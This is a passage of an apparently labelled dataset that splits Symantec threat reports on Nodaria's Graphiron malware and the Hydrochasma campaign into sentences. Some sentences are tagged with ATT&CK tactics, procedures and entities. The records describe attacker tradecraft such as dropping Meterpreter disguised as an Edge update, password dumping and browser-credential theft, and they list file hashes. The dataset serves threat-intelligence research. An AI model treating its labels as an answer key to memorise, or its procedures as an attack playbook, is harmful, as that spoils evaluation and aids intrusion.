HKCU\\Software\\SimonTatham\\Putty\\Sessions Similarity to older tools Graphiron has some similarities with older Nodaria tools such as GraphSteel and GrimPlant.", "sentence_text": "GraphSteel is designed to exfiltrate files along with system information and credentials stolen from the password vault using PowerShell.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-18_aptnotes_report-p2-s32-fe8f8f", "source": "aptnotes", "doc_id": "18_aptnotes_report", "page_number": 2, "sentence_id": 32, "context_before": "GraphSteel is designed to exfiltrate files along with system information and credentials stolen from the password vault using PowerShell.", "sentence_text": "Graphiron has similar functionality but can exfiltrate much more, such as screenshots and SSH keys.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-18_aptnotes_report-p2-s33-d1f3e3", "source": "aptnotes", "doc_id": "18_aptnotes_report", "page_number": 2, "sentence_id": 33, "context_before": "Graphiron has similar functionality but can exfiltrate much more, such as screenshots and SSH keys.", "sentence_text": "Go Internal\nMalware version name Obfuscation Libraries used Infostealer.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-18_aptnotes_report-p2-s34-ea3249", "source": "aptnotes", "doc_id": "18_aptnotes_report", "page_number": 2, "sentence_id": 34, "context_before": "Go Internal\nMalware version name Obfuscation Libraries used Infostealer.", "sentence_text": "Graphiron 1.18 n/a yes jcmturner/aescts", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-18_aptnotes_report-p2-s35-fd2a2b", "source": "aptnotes", "doc_id": "18_aptnotes_report", "page_number": 2, "sentence_id": 35, "context_before": "Graphiron 1.18 n/a yes jcmturner/aescts", "sentence_text": "There is also limited evidence to suggest that the group has been involved in attacks on targets in Kyrgyzstan.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-18_aptnotes_report-p2-s36-2d4750", "source": "aptnotes", "doc_id": "18_aptnotes_report", "page_number": 2, "sentence_id": 36, "context_before": "There is also limited evidence to suggest that the group has been involved in attacks on targets in Kyrgyzstan.", "sentence_text": "Third-party reporting has also linked the group to attacks on Georgia.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-18_aptnotes_report-p2-s37-214dde", "source": "aptnotes", "doc_id": "18_aptnotes_report", "page_number": 2, "sentence_id": 37, "context_before": "Third-party reporting has also linked the group to attacks on Georgia.", "sentence_text": "The group sprang to public attention when it was linked to the WhisperGate wiper attacks that hit multiple Ukrainian government computers and websites in January 2022.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-18_aptnotes_report-p3-s39-dfcdab", "source": "aptnotes", "doc_id": "18_aptnotes_report", "page_number": 3, "sentence_id": 39, "context_before": "2/3", "sentence_text": "The group’s usual infection vector is spear-phishing emails, which are then used to deliver a range of payloads to targets.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-18_aptnotes_report-p3-s40-7026ad", "source": "aptnotes", "doc_id": "18_aptnotes_report", "page_number": 3, "sentence_id": 40, "context_before": "The group’s usual infection vector is spear-phishing emails, which are then used to deliver a range of payloads to targets.", "sentence_text": "Custom tools used by the group to date include:\nElephant Dropper: A dropper Elephant Downloader: A downloader SaintBot: A downloader OutSteel: Information stealer GrimPlant (aka Elephant Implant): Collects system information and maintains persistence GraphSteel (aka Elephant Client): Information stealer Like Graphiron, many of Nodaria’s earlier tools were written in Go.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-18_aptnotes_report-p3-s41-50b373", "source": "aptnotes", "doc_id": "18_aptnotes_report", "page_number": 3, "sentence_id": 41, "context_before": "Custom tools used by the group to date include:\nElephant Dropper: A dropper Elephant Downloader: A downloader SaintBot: A downloader OutSteel: Information stealer GrimPlant (aka Elephant Implant): Collects system information and maintains persistence GraphSteel (aka Elephant Client): Information stealer Like Graphiron, many of Nodaria’s earlier tools were written in Go.", "sentence_text": "Graphiron appears to be the latest piece of malware authored by the same developers, likely in response to a need for additional functionality.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-18_aptnotes_report-p3-s42-4bd808", "source": "aptnotes", "doc_id": "18_aptnotes_report", "page_number": 3, "sentence_id": 42, "context_before": "Graphiron appears to be the latest piece of malware authored by the same developers, likely in response to a need for additional functionality.", "sentence_text": "While Nodaria was relatively unknown prior to the Russian invasion of Ukraine, the group’s high-level activity over the past year suggests that it is now one of the key players in Russia’s ongoing cyber campaigns against Ukraine.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-18_aptnotes_report-p3-s43-4a9b46", "source": "aptnotes", "doc_id": "18_aptnotes_report", "page_number": 3, "sentence_id": 43, "context_before": "While Nodaria was relatively unknown prior to the Russian invasion of Ukraine, the group’s high-level activity over the past year suggests that it is now one of the key players in Russia’s ongoing cyber campaigns against Ukraine.", "sentence_text": "Protection/Mitigation", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-18_aptnotes_report-p3-s44-fc0222", "source": "aptnotes", "doc_id": "18_aptnotes_report", "page_number": 3, "sentence_id": 44, "context_before": "Protection/Mitigation", "sentence_text": "For the latest protection updates, please visit the Symantec Protection Bulletin.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-18_aptnotes_report-p3-s45-fe64c1", "source": "aptnotes", "doc_id": "18_aptnotes_report", "page_number": 3, "sentence_id": 45, "context_before": "For the latest protection updates, please visit the Symantec Protection Bulletin.", "sentence_text": "Indicators of Compromise If an IOC is malicious and the file available to us, Symantec Endpoint products will detect and block that file.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-18_aptnotes_report-p3-s46-652b56", "source": "aptnotes", "doc_id": "18_aptnotes_report", "page_number": 3, "sentence_id": 46, "context_before": "Indicators of Compromise If an IOC is malicious and the file available to us, Symantec Endpoint products will detect and block that file.", "sentence_text": "SHA-256:\n0d0a675516f1ff9247f74df31e90f06b0fea160953e5e3bada5d1c8304cfbe63 — Downloader.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-18_aptnotes_report-p3-s47-5afd81", "source": "aptnotes", "doc_id": "18_aptnotes_report", "page_number": 3, "sentence_id": 47, "context_before": "SHA-256:\n0d0a675516f1ff9247f74df31e90f06b0fea160953e5e3bada5d1c8304cfbe63 — Downloader.", "sentence_text": "Graphiron 878450da2e44f5c89ce1af91479b9a9491fe45211fee312354dfe69e967622db — Downloader.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-18_aptnotes_report-p3-s48-90f94e", "source": "aptnotes", "doc_id": "18_aptnotes_report", "page_number": 3, "sentence_id": 48, "context_before": "Graphiron 878450da2e44f5c89ce1af91479b9a9491fe45211fee312354dfe69e967622db — Downloader.", "sentence_text": "Graphiron 80e6a9079deffd6837363709f230f6ab3b2fe80af5ad30e46f6470a0c73e75a7 — Infostealer.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-18_aptnotes_report-p3-s49-b79d95", "source": "aptnotes", "doc_id": "18_aptnotes_report", "page_number": 3, "sentence_id": 49, "context_before": "Graphiron 80e6a9079deffd6837363709f230f6ab3b2fe80af5ad30e46f6470a0c73e75a7 — Infostealer.", "sentence_text": "Graphiron eee1d29a425231d981efbc25b6d87fdb9ca9c0e4e3eb393472d5967f7649a1e6 — Infostealer.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-18_aptnotes_report-p3-s50-053f06", "source": "aptnotes", "doc_id": "18_aptnotes_report", "page_number": 3, "sentence_id": 50, "context_before": "Graphiron eee1d29a425231d981efbc25b6d87fdb9ca9c0e4e3eb393472d5967f7649a1e6 — Infostealer.", "sentence_text": "Graphiron f0fd55b743a2e8f995820884e6e684f1150e7a6369712afe9edb57ffd09ad4c1 — Infostealer.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-18_aptnotes_report-p3-s51-b0df61", "source": "aptnotes", "doc_id": "18_aptnotes_report", "page_number": 3, "sentence_id": 51, "context_before": "Graphiron f0fd55b743a2e8f995820884e6e684f1150e7a6369712afe9edb57ffd09ad4c1 — Infostealer.", "sentence_text": "Graphiron f86db0c0880bb81dbfe5ea0b087c2d17fab7b8eefb6841d15916ae9442dd0cce — Infostealer.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-19_aptnotes_report-p1-s1-f45f40", "source": "aptnotes", "doc_id": "19_aptnotes_report", "page_number": 1, "sentence_id": 1, "context_before": "", "sentence_text": "Hydrochasma: Previously Unknown Group Targets Medical and Shipping Organizations in Asia symantec-enterprise-blogs.security.com/blogs/threat-intelligence/hydrochasma-asia-medical-shipping-intelligence- gathering Shipping companies and medical laboratories in Asia are being targeted in a likely intelligence-gathering campaign that relies exclusively on publicly available and living-off- the-land tools.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-19_aptnotes_report-p1-s2-f44596", "source": "aptnotes", "doc_id": "19_aptnotes_report", "page_number": 1, "sentence_id": 2, "context_before": "Hydrochasma: Previously Unknown Group Targets Medical and Shipping Organizations in Asia symantec-enterprise-blogs.security.com/blogs/threat-intelligence/hydrochasma-asia-medical-shipping-intelligence- gathering Shipping companies and medical laboratories in Asia are being targeted in a likely intelligence-gathering campaign that relies exclusively on publicly available and living-off- the-land tools.", "sentence_text": "This activity has been ongoing since at least October 2022.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-19_aptnotes_report-p1-s3-635d6d", "source": "aptnotes", "doc_id": "19_aptnotes_report", "page_number": 1, "sentence_id": 3, "context_before": "This activity has been ongoing since at least October 2022.", "sentence_text": "While Symantec, by Broadcom Software, did not see any data being exfiltrated in this campaign, the targets, as well as some of the tools used, indicate that the most likely motivation in this campaign is intelligence gathering.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-19_aptnotes_report-p1-s4-d1c695", "source": "aptnotes", "doc_id": "19_aptnotes_report", "page_number": 1, "sentence_id": 4, "context_before": "While Symantec, by Broadcom Software, did not see any data being exfiltrated...", "sentence_text": "Attack Chain\nThe infection vector used by Hydrochasma was most likely a phishing email.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-19_aptnotes_report-p1-s5-bb6db6", "source": "aptnotes", "doc_id": "19_aptnotes_report", "page_number": 1, "sentence_id": 5, "context_before": "Attack Chain\nThe infection vector used by Hydrochasma was most likely a phishing email.", "sentence_text": "The first suspicious activity seen on machines is a lure document with a file name in the victim organization’s native language that appears to indicate it was an email attachment:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-19_aptnotes_report-p1-s6-96ff21", "source": "aptnotes", "doc_id": "19_aptnotes_report", "page_number": 1, "sentence_id": 6, "context_before": "The first suspicious activity seen on machines is a lure document with a file name in the victim organization’s native language that appears to indicate it was an email attachment:", "sentence_text": "[TRANSLATED FROM THE ORIGINAL]", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-19_aptnotes_report-p1-s7-3e3a5c", "source": "aptnotes", "doc_id": "19_aptnotes_report", "page_number": 1, "sentence_id": 7, "context_before": "[TRANSLATED FROM THE ORIGINAL]", "sentence_text": "Product Specification-Freight-Company Qualification Information wps-pdf Export.pdf.exe Another lure document appears to be mimicking a resume:\n[TRANSLATED FROM THE ORIGINAL]", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-19_aptnotes_report-p1-s8-12b69b", "source": "aptnotes", "doc_id": "19_aptnotes_report", "page_number": 1, "sentence_id": 8, "context_before": "Product Specification-Freight-Company Qualification Information wps-pdf Export.pdf.exe Another lure document appears to be mimicking a resume:\n[TRANSLATED FROM THE ORIGINAL]", "sentence_text": "[REDACTED] University-Development Engineer.exe Following initial access on one machine, the attackers were seen dropping Fast Reverse Proxy (FRP), a tool that can expose a local server that is sitting behind an NAT or firewall to the internet.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" }, { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Drop and deploy the Fast Reverse Proxy (FRP) tool on a compromised machine to enable external access to an internal server behind NAT or firewall.", "entities": [ { "text": "the attackers", "start": 88, "end": 101, "label": "ThreatActor" }, { "text": "dropping Fast Reverse Proxy (FRP)", "start": 112, "end": 145, "label": "Action" }, { "text": "Fast Reverse Proxy (FRP)", "start": 121, "end": 145, "label": "MalwareTool" } ] }, { "uid": "aptnotes-19_aptnotes_report-p1-s9-ba5a91", "source": "aptnotes", "doc_id": "19_aptnotes_report", "page_number": 1, "sentence_id": 9, "context_before": "[REDACTED] University-Development Engineer.exe Following initial access on one machine, the attackers were seen dropping Fast Reverse Proxy (FRP), a tool that can expose a local server that is sitting behind an NAT or firewall to the internet.", "sentence_text": "This drops a legitimate Microsoft Edge update file:\n%TEMP%\\MicrosoftEdgeUpdate.exe\nAnother file, %TEMP%\\msedgeupdate.dll, is then seen on victim machines.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "The attacker drops a payload file onto the system in the temporary directory.", "entities": [ { "text": "drops a legitimate Microsoft Edge update file", "start": 5, "end": 50, "label": "Action" }, { "text": "%TEMP%\\MicrosoftEdgeUpdate.exe", "start": 52, "end": 82, "label": "Infrastructure_Indicator" }, { "text": "%TEMP%\\msedgeupdate.dll", "start": 97, "end": 120, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-19_aptnotes_report-p1-s10-3d5151", "source": "aptnotes", "doc_id": "19_aptnotes_report", "page_number": 1, "sentence_id": 10, "context_before": "This drops a legitimate Microsoft Edge update file:\n%TEMP%\\MicrosoftEdgeUpdate.exe\nAnother file, %TEMP%\\msedgeupdate.dll, is then seen on victim machines.", "sentence_text": "But this file is actually Meterpreter, a tool that is part of the Metasploit framework and which can be used for remote access.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-19_aptnotes_report-p1-s11-9d649f", "source": "aptnotes", "doc_id": "19_aptnotes_report", "page_number": 1, "sentence_id": 11, "context_before": "But this file is actually Meterpreter, a tool that is part of the Metasploit framework and which can be used for remote access.", "sentence_text": "Other tools that were subsequently seen on this victim’s network included:\n1/7", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-19_aptnotes_report-p2-s12-065ec1", "source": "aptnotes", "doc_id": "19_aptnotes_report", "page_number": 2, "sentence_id": 12, "context_before": "Other tools that were subsequently seen on this victim’s network included:\n1/7", "sentence_text": "Gogo scanning tool: An automated scanning engine originally designed for use by red teams.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-19_aptnotes_report-p2-s13-8f42cb", "source": "aptnotes", "doc_id": "19_aptnotes_report", "page_number": 2, "sentence_id": 13, "context_before": "Gogo scanning tool: An automated scanning engine originally designed for use by red teams.", "sentence_text": "Process Dumper (lsass.exe): A tool that allows attackers to dump domain passwords.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-19_aptnotes_report-p2-s14-9f4d8d", "source": "aptnotes", "doc_id": "19_aptnotes_report", "page_number": 2, "sentence_id": 14, "context_before": "Process Dumper (lsass.exe): A tool that allows attackers to dump domain passwords.", "sentence_text": "It ostensibly has legitimate uses as a penetration testing tool but is invariably exploited by malicious actors.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-19_aptnotes_report-p2-s15-ba68c5", "source": "aptnotes", "doc_id": "19_aptnotes_report", "page_number": 2, "sentence_id": 15, "context_before": "It ostensibly has legitimate uses as a penetration testing tool but is invariably exploited by malicious actors.", "sentence_text": "AlliN scanning tool: A pentesting scan tool that can be used for lateral penetration of the intranet.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-19_aptnotes_report-p2-s16-2c697a", "source": "aptnotes", "doc_id": "19_aptnotes_report", "page_number": 2, "sentence_id": 16, "context_before": "AlliN scanning tool: A pentesting scan tool that can be used for lateral penetration of the intranet.", "sentence_text": "Fscan: A publicly available hacktool that can scan for open ports and more.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-19_aptnotes_report-p2-s17-12db91", "source": "aptnotes", "doc_id": "19_aptnotes_report", "page_number": 2, "sentence_id": 17, "context_before": "Fscan: A publicly available hacktool that can scan for open ports and more.", "sentence_text": "Dogz proxy tool: A free VPN proxy tool.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-19_aptnotes_report-p2-s18-7260f3", "source": "aptnotes", "doc_id": "19_aptnotes_report", "page_number": 2, "sentence_id": 18, "context_before": "Dogz proxy tool: A free VPN proxy tool.", "sentence_text": "A shellcode loader and a corrupted portable executable (PE) file were also deployed on this victim’s network.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1204", "name": "User Execution" } ], "procedure": "Deploy a shellcode loader and a corrupted PE file on the victim network for subsequent execution.", "entities": [ { "text": "were also deployed on this victim’s network", "start": 65, "end": 108, "label": "Action" }, { "text": "shellcode loader", "start": 2, "end": 18, "label": "MalwareTool" }, { "text": "portable executable (PE) file", "start": 35, "end": 64, "label": "MalwareTool" } ] }, { "uid": "aptnotes-19_aptnotes_report-p2-s19-7a2851", "source": "aptnotes", "doc_id": "19_aptnotes_report", "page_number": 2, "sentence_id": 19, "context_before": "A shellcode loader and a corrupted portable executable (PE) file were also deployed on this victim’s network.", "sentence_text": "SoftEtherVPN: The presence of this tool was what first prompted Symantec researchers to investigate this activity.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-19_aptnotes_report-p2-s20-d65702", "source": "aptnotes", "doc_id": "19_aptnotes_report", "page_number": 2, "sentence_id": 20, "context_before": "SoftEtherVPN: The presence of this tool was what first prompted Symantec researchers to investigate this activity.", "sentence_text": "Procdump: Microsoft Sysinternals tool for monitoring an application for CPU spikes and generating crash dumps, but which can also be used as a general process dump utility.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-19_aptnotes_report-p2-s21-7fb2f6", "source": "aptnotes", "doc_id": "19_aptnotes_report", "page_number": 2, "sentence_id": 21, "context_before": "Procdump: Microsoft Sysinternals tool for monitoring an application for CPU spikes and generating crash dumps, but which can also be used as a general process dump utility.", "sentence_text": "BrowserGhost: A publicly available tool that can grab passwords from an internet browser.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-19_aptnotes_report-p2-s22-ac5760", "source": "aptnotes", "doc_id": "19_aptnotes_report", "page_number": 2, "sentence_id": 22, "context_before": "BrowserGhost: A publicly available tool that can grab passwords from an internet browser.", "sentence_text": "Gost proxy: A tunneling tool.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-19_aptnotes_report-p2-s23-08c732", "source": "aptnotes", "doc_id": "19_aptnotes_report", "page_number": 2, "sentence_id": 23, "context_before": "Gost proxy: A tunneling tool.", "sentence_text": "Ntlmrelay: An NTLM relay attack allows an attacker to intercept validated authentication requests in order to access network services.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-19_aptnotes_report-p2-s24-d8593e", "source": "aptnotes", "doc_id": "19_aptnotes_report", "page_number": 2, "sentence_id": 24, "context_before": "Ntlmrelay: An NTLM relay attack allows an attacker to intercept validated authentication requests in order to access network services.", "sentence_text": "Task Scheduler: Allows tasks to be automated on a computer.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-19_aptnotes_report-p2-s25-4072cf", "source": "aptnotes", "doc_id": "19_aptnotes_report", "page_number": 2, "sentence_id": 25, "context_before": "Task Scheduler: Allows tasks to be automated on a computer.", "sentence_text": "Go-strip: Used to make a Go binary smaller in size.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-19_aptnotes_report-p2-s26-57484a", "source": "aptnotes", "doc_id": "19_aptnotes_report", "page_number": 2, "sentence_id": 26, "context_before": "Go-strip: Used to make a Go binary smaller in size.", "sentence_text": "HackBrowserData: An open-source tool that can decrypt browser data.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-19_aptnotes_report-p2-s27-1966a3", "source": "aptnotes", "doc_id": "19_aptnotes_report", "page_number": 2, "sentence_id": 27, "context_before": "HackBrowserData: An open-source tool that can decrypt browser data.", "sentence_text": "The tools deployed by Hydrochasma indicate a desire to achieve persistent and stealthy access to victim machines, as well as an effort to escalate privileges and spread laterally across victim networks.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-19_aptnotes_report-p2-s28-8301c9", "source": "aptnotes", "doc_id": "19_aptnotes_report", "page_number": 2, "sentence_id": 28, "context_before": "The tools deployed by Hydrochasma indicate a desire to achieve persistent and stealthy access to victim machines, as well as an effort to escalate privileges and spread laterally across victim networks.", "sentence_text": "While Symantec researchers didn’t observe data being exfiltrated from victim machines, some of the tools deployed by Hydrochasma do allow for remote access and could potentially be used to exfiltrate data.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-19_aptnotes_report-p2-s29-0fd92e", "source": "aptnotes", "doc_id": "19_aptnotes_report", "page_number": 2, "sentence_id": 29, "context_before": "While Symantec researchers didn’t observe data being exfiltrated from victim machines, some of the tools deployed by Hydrochasma do allow for remote access and could potentially be used to exfiltrate data.", "sentence_text": "The sectors targeted also point towards the motivation behind this attack being intelligence gathering.\n2/7", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-19_aptnotes_report-p3-s30-005418", "source": "aptnotes", "doc_id": "19_aptnotes_report", "page_number": 3, "sentence_id": 30, "context_before": "The sectors targeted also point towards the motivation behind this attack being intelligence gathering.\n2/7", "sentence_text": "The lack of custom malware used in this attack is also notable.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-19_aptnotes_report-p3-s31-5715ea", "source": "aptnotes", "doc_id": "19_aptnotes_report", "page_number": 3, "sentence_id": 31, "context_before": "The lack of custom malware used in this attack is also notable.", "sentence_text": "Relying exclusively on living- off-the-land and publicly available tools can help make an attack stealthier, while also making attribution more difficult.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-19_aptnotes_report-p3-s32-87e939", "source": "aptnotes", "doc_id": "19_aptnotes_report", "page_number": 3, "sentence_id": 32, "context_before": "Relying exclusively on living- off-the-land and publicly available tools can help make an attack stealthier, while also making attribution more difficult.", "sentence_text": "Symantec did not see evidence to link this activity to a known actor, prompting us to create the new actor identity of Hydrochasma for those behind this activity.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-19_aptnotes_report-p3-s33-7eb4eb", "source": "aptnotes", "doc_id": "19_aptnotes_report", "page_number": 3, "sentence_id": 33, "context_before": "Symantec did not see evidence to link this activity to a known actor, prompting us to create the new actor identity of Hydrochasma for those behind this activity.", "sentence_text": "Protection/Mitigation", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-19_aptnotes_report-p3-s34-5befe6", "source": "aptnotes", "doc_id": "19_aptnotes_report", "page_number": 3, "sentence_id": 34, "context_before": "Protection/Mitigation", "sentence_text": "For the latest protection updates, please visit the Symantec Protection Bulletin.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-19_aptnotes_report-p3-s35-b7d768", "source": "aptnotes", "doc_id": "19_aptnotes_report", "page_number": 3, "sentence_id": 35, "context_before": "For the latest protection updates, please visit the Symantec Protection Bulletin.", "sentence_text": "Indicators of Compromise If an IOC is malicious and the file available to us, Symantec Endpoint products will detect and block that file.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-19_aptnotes_report-p3-s36-d7e7e3", "source": "aptnotes", "doc_id": "19_aptnotes_report", "page_number": 3, "sentence_id": 36, "context_before": "Indicators of Compromise If an IOC is malicious and the file available to us, Symantec Endpoint products will detect and block that file.", "sentence_text": "File Indicators\nSHA256\n409f89f4a00e649ccd8ce1a4a08afe03cb5d1c623ab54a80874aebf09a9840e5 – Fast Reverse Proxy 47d328c308c710a7e84bbfb71aa09593e7a82b707fde0fb9356fb7124118dc88 – GoGo", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-19_aptnotes_report-p3-s37-bbac65", "source": "aptnotes", "doc_id": "19_aptnotes_report", "page_number": 3, "sentence_id": 37, "context_before": "File Indicators\nSHA256\n409f89f4a00e649ccd8ce1a4a08afe03cb5d1c623ab54a80874aebf09a9840e5 – Fast Reverse Proxy 47d328c308c710a7e84bbfb71aa09593e7a82b707fde0fb9356fb7124118dc88 – GoGo", "sentence_text": "Scanning Tool 6698a81e993363fab0550855c339d9a20a25d159aaa9c4b91f60bb4a68627132 – Dropper 7229bd06cb2a4bbe157d72a3734ba25bc7c08d6644c3747cdc4bcc5776f4b5b9 – Process Dumper (lsass.exe)\n72885373e3e8404f1889e479b3d46dd8111280379c4065bfc1e62df093e42aba – Fast Reverse Proxy 72bc8b30df3cdde6c58ef1e8a3eae9e7882d1abe0b7d4810270b5a0cc077bb1a – Cobalt Strike Beacon 7b410fa2a93ed04a4155df30ffde7d43131c724cdf60815ee354988b31e826f8 – Fast Reverse Proxy 7f0807d40e9417141bf274ef8467a240e20109a489524e62b090bccdb4998bc6 – Process Dumper (lsass.exe)\n8c0f0d1acb04693a6bdd456a6fcd37243e502b21d17c8d9256940fc7943b1e9a – Cobalt Strike Beacon 3/7", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-19_aptnotes_report-p4-s38-bdb2c4", "source": "aptnotes", "doc_id": "19_aptnotes_report", "page_number": 4, "sentence_id": 38, "context_before": "Scanning Tool 6698a81e993363fab0550855c339d9a20a25d159aaa9c4b91f60bb4a68627132 – Dropper 7229bd06cb2a4bbe157d72a3734ba25bc7c08d6644c3747cdc4bcc5776f4b5b9 – Process Dumper (lsass.exe)\n72885373e3e8404f1889e479b3d46dd8111280379c4065bfc1e62df093e42aba – Fast Reverse Proxy 72bc8b30df3cdde6c58ef1e8a3eae9e7882d1abe0b7d4810270b5a0cc077bb1a – Cobalt Strike Beacon 7b410fa2a93ed04a4155df30ffde7d43131c724cdf60815ee354988b31e826f8 – Fast Reverse Proxy 7f0807d40e9417141bf274ef8467a240e20109a489524e62b090bccdb4998bc6 – Process Dumper (lsass.exe)\n8c0f0d1acb04693a6bdd456a6fcd37243e502b21d17c8d9256940fc7943b1e9a – Cobalt Strike Beacon 3/7", "sentence_text": "8e32ea45e1139b459742e676b7b2499810c3716216ba2ec55b77c79495901043 – Fast Reverse Proxy 981e5f7219a2f92a908459529c42747ac5f5a820995f66234716c538b19993eb – GoGo", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-19_aptnotes_report-p4-s39-0f7d54", "source": "aptnotes", "doc_id": "19_aptnotes_report", "page_number": 4, "sentence_id": 39, "context_before": "8e32ea45e1139b459742e676b7b2499810c3716216ba2ec55b77c79495901043 – Fast Reverse Proxy 981e5f7219a2f92a908459529c42747ac5f5a820995f66234716c538b19993eb – GoGo", "sentence_text": "Scanning Tool 9ebd789e8ca8b96ed55fc8e95c98a45a61baea3805fd440f50f2bde5ffd7a372 – Fast Reverse Proxy 9f5f7ba7d276f162cc32791bfbaa0199013290a8ac250eb95fd90bc004c3fd36 – Cobalt Strike Beacon a0f5966fcc64ce2d10f24e02ae96cdc91590452b9a96b3b1d4a2f66c722eec34 – AllIn Scanning Tool cb03b5d517090b20749905a330c55df9eb4d1c6b37b1b31fae1982e32fd10009 – Fscan d1c4968e7690fd40809491acc8787389de0b7cbc672c235639ae7b4d07d04dd4 – Shellcode Loader de01492b44372f2e4e38354845e7f86e0be5fb8f5051baafd004ec5c1567039f – Cobalt Strike Beacon e378d8b5a35d4ec75cae7524e64c1d605f1511f9630c671321ee46aa7c4d378b – PE File eba22f50eedfec960fac408d9e6add4b0bd91dd5294bee8cff730db53b822841 – Dropper fc4b5f2ee9da1fe105bb1b7768754d48f798bf181cbc53583387578a5ebc7b56 – Dogz Proxy Tool 02fe00ffd1b076983f3866c04ca95c56cef88c2564fabb586e11e54986e87ba7 084d1fc4236011d442801e423485c8e58f68dc14ec0a8b716fa0fd210de43dda 1744fac628262aa0cf3810bd5168375959be41764c8ca2fa41950a7b1f8f2fad 1d087f6a17227769bcebc799a2cdf1bb2a8fdf6ba560d21a88bb71f1c213a42c 327fc116f8f48f97292184bb50cb3db418f368b3e2a0fb41267ba40254a35a89 3516f94b0fb57e93c6659d813cbf5fb3617dea7a667c78cb70a1914306327906 41b6d26926706bb68530ddff234f69757e3bbef91c47eb0255313ed86cb3f806 